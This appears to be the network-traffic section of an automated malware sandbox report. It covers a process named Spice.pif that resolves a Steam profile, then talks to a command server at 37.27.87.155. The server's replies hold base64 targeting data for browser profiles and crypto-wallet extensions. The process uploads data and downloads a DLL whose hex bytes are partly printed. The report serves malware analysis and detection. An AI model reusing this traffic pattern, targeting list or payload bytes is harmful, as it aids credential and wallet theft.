Apr 30, 2024 07:42:33.528533936 CEST	192.168.2.8	1.1.1.1	0xb8cd	Standard query (0)	ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVB	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:43:52.938895941 CEST	192.168.2.8	1.1.1.1	0xc7ec	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 30, 2024 07:42:33.677962065 CEST	1.1.1.1	192.168.2.8	0xb8cd	Name error (3)	ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVB	none	none	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:43:53.041352987 CEST	1.1.1.1	192.168.2.8	0xc7ec	No error (0)	steamcommunity.com		23.7.115.52	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

37.27.87.155

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	23.7.115.52	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:43:53 UTC	119	OUT	GET /profiles/76561199677575543 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:43:53 UTC	1882	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 30 Apr 2024 05:43:53 GMT Content-Length: 34667 Connection: close Set-Cookie: sessionid=84fd87eb03becf16119275aa; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C23bec3383ae3c73676393b741a4cd362; Path=/; Secure; HttpOnly; SameSite=None
2024-04-30 05:43:53 UTC	14502	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-30 05:43:53 UTC	10074	IN	Data Raw: 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72 Data Ascii: ent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header
2024-04-30 05:43:53 UTC	10091	IN	Data Raw: 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75 Data Ascii: ;https:\/\/store.cloudflare.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/","COMMUNITY_BASE_URL":"https:\/\/steamcommunity.com\/","CHAT_BASE_URL&qu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:43:54 UTC	169	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:43:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:43:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:43:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49711	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:43:55 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:43:55 UTC	278	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 39 36 42 37 39 34 41 41 30 42 36 31 32 33 33 31 37 34 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 41 Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="hwid"AE96B794AA0B612331747-a33c7340-61ca-11ee-8c18-806e6f6e6963------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------A
2024-04-30 05:43:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:43:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:43:56 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|52fb76e376ae1d7de05801a3ed56b5bd\|1\|0\|1\|1\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:43:58 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:43:58 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------IJEHIDHDAKJDHJKEBFIECont
2024-04-30 05:43:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:43:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:43:58 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:43:59 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:43:59 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------GHDBAFIIECBFHIEBKJJKCont
2024-04-30 05:44:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:00 UTC	5533	IN	Data Raw: 31 35 39 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1590TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:00 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 6937 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:00 UTC	6937	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------IDGDAAKFHIEHIECAFBAACont
2024-04-30 05:44:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49715	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:03 UTC	177	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:03 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:03 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 22 Apr 2024 11:42:56 GMT Connection: close ETag: "66264d40-258600" Accept-Ranges: bytes
2024-04-30 05:44:03 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-30 05:44:03 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-30 05:44:03 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-30 05:44:04 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-30 05:44:04 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
